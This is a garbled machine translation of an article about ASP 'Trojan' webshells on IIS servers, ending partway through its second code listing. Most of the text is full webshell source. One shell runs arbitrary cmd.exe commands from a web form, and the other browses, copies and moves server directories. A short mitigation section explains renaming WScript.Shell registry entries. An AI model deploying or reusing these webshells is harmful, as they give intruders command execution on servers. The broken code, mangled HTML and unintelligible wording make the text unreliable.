Web|web Service |web Server | Trojan Horse with the development of ASP technology, network based on ASP technology to develop more and more web sites, the support of ASP technology can be said to be a Windows system IIS Server a basic function. But the backdoor of Trojan Horse based on ASP technology, also more and more, and function also more and more powerful. Because the ASP itself is the server to provide a tribute service function, so this ASP script Trojan door, will not be anti-virus software killing. By hackers are called "never be killed by the back door." Because of its high concealment and difficult to kill, the safety of the site poses a serious threat. Therefore, for the prevention and removal of ASP Trojan, for our network management personnel put forward a higher technical requirements. Below I combine personal experience, talk about two more typical ASP Trojan prevention method, hope for everyone can help.
The following is the code for the first Trojan:
<title> ASP Shell </title>
<%@ Language=vbscript%>
<%
Dim Oscript
Dim oscriptnet
Dim Ofilesys, Ofile
Dim Szcmd, Sztempfile
On Error Resume Next
--Create the COM objects that we'll be using--
Set oscript = Server.CreateObject ("WSCRIPT. SHELL ")
Set oscriptnet = Server.CreateObject ("Wscript.Network")
Set Ofilesys = Server.CreateObject ("Scripting.FileSystemObject")
--Check for a command so we have posted--
Szcmd = Request.Form (". CMD ")
If (Szcmd <> "") Then
--Use a poor mans pipe ... a temp file--
Sztempfile = "C:" & Ofilesys.gettempname ()
Call Oscript.run ("cmd.exe/c" & Szcmd & ">" & Sztempfile, 0, True)
Set ofile = Ofilesys.opentextfile (sztempfile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<form action= "<%= request.servervariables (" URL ")%>" method= "POST"
<input type=text name= ". CMD "size=45 value=" <%= szcmd%> "
<input type=submit value= "Execute command"
</FORM>
<PRE> <%
If (IsObject (ofile)) Then
--Read the output from our command and remove the temp file--
On Error Resume Next
Response.Write Server.HTMLEncode (Ofile.readall)
Ofile.close
Call Ofilesys.deletefile (Sztempfile, True)
End If
%>
</BODY>
</HTML>
Then enter the dir command point execution on the command line to view the directory!! It can use a variety of DOS commands, such as: copy, net, netstat and so on.
However, its default execution permission is only guest, which is the Iusr_computer user's execute permission. Of course, if you add iusr_computer users to the Admins group, you have administrator privileges. The feature of this trojan is that it is very convenient to use. Almost want to be the same as DOS command line window xx. However, if the server restricts the FSO (no component uploads), then it has no way to use it. There is also in the server after the increase in the virtual host can not be used. Can only be used in the default Web site, so it is relatively narrow in scope.
For the precautionary approach let's take a look at its code and know:
Set oscript = Server.CreateObject ("WSCRIPT. SHELL ")
' Established a Wscript.Shell object named Oscript for command execution '
Set oscriptnet = Server.CreateObject ("Wscript.Network")
Set Ofilesys = Server.CreateObject ("Scripting.FileSystemObject")
The above three lines of code create Wscript.Shell, Wscript.Network, Scripting.FileSystemObject three objects, we simply rename or delete the items in the registry to control the Wscript.Shell object. The following figure: It is noteworthy: we should put "WSCRIPT." SHELL "Items and" WSCRIPT. SHELL.1 "Both should be renamed or deleted. Because if we only modify "WSCRIPT." SHELL "Item. So the hackers just change the code as follows:
Set oscript = Server.CreateObject ("WSCRIPT. SHELL.1 ")
This backdoor Trojan can be carried out again.
As you may have thought, we are on "WSCRIPT." SHELL "Items and" WSCRIPT. SHELL.1 "When renamed, must be not easy to be guessed by hackers, because for example: you put" WSCRIPT. The SHELL was "changed" to WSCRIPT. SHELL888 ". Hackers just change the code accordingly:
Set oscript = Server.CreateObject ("WSCRIPT. SHELL888 ")
The Trojan horse program can be executed again. There is also a change to the registry after the Web service to restart, the settings will be valid.
Next, let's take a look at the next ASP Backdoor Trojan program code:
<%response.write "<font size=6 color=red> can only perform one xx at a time as </font>"%>
<%response.write now ()%> <BR> The physical path where the program resides:
<%response.write Request.ServerVariables ("Appl_physical_path")%>
<title> ASPs Shell.Application Backdoor </title>
<body>
<form action= "<%= request.servervariables (" URL ")%>" method= "POST"
<input type=text name=text value= "<%=szcmd%>" Enter the directory you want to browse <br>
<input type=text name=text1 value= "<%=szcmd1%>"
Copy
<input type=text name=text2 value= "<%=szcmd2%>" > <br>
<input type=text name=text3 value= "<%=szcmd3%>"
Move
<input type=text name=text4 value= "<%=szcmd4%>" > <br>
Path: <input type=text name=text5 value= "<%=szcmd5%>"
Program: <input type=text name=text6 value= "<%=szcmd6%>" > <br>
<input type=submit name=sb value= Send command
</form>
</body>
<%
Szcmd = Request.Form ("text") directory browsing
if (Szcmd <> "") Then
Set Shell=server.createobject ("Shell.Application") to create a Shell object
Set Fod1=shell.namespace (Szcmd)
Set Foditems=fod1.items
For all Co in foditems
Response.Write "<font color=red>" & Co.path & "-----" & co.size & "</font> <br>"
Next
End If
%> <%
szCMD1 = Request.Form ("Text1") directory copy, cannot make file copy
szCMD2 = Request.Form ("Text2")
If Szcmd1 <> "and Szcmd2 <>" "Then
Set Shell1=server.createobject ("Shell.Application") to create a Shell object
Set Fod1=shell1.namespace (SZCMD2)
For I=len (SZCMD1) to 1 step-1
If mid (szcmd1,i,1) = "" Then
Path=left (szcmd1,i-1)
Exit For
End If
Next
If Len (path) =2 then Path=path & ""
Path2=right (Szcmd1,len (SZCMD1)-i)
Set Fod2=shell1.namespace (PATH)
Set Foditem=fod2.parsename (path2)
Fod1.copyhere Foditem
Response.Write "Command Completed success!"
End If
%> <%
SzCMD3 = Request.Form ("Text3") directory move
SzCMD4 = Request.Form ("Text4")
If Szcmd3 <> "and Szcmd4 <>" "Then
Set Shell2=server.createobject ("Shell.Application") to create a Shell object
Set Fod1=shell2.namespace (SZCMD4) for I=len (SZCMD3) to 1 step-1
If mid (szcmd3,i,1) = "" Then
Path=left (szcmd3,i-1)
Exit For
End If
Next
If Len (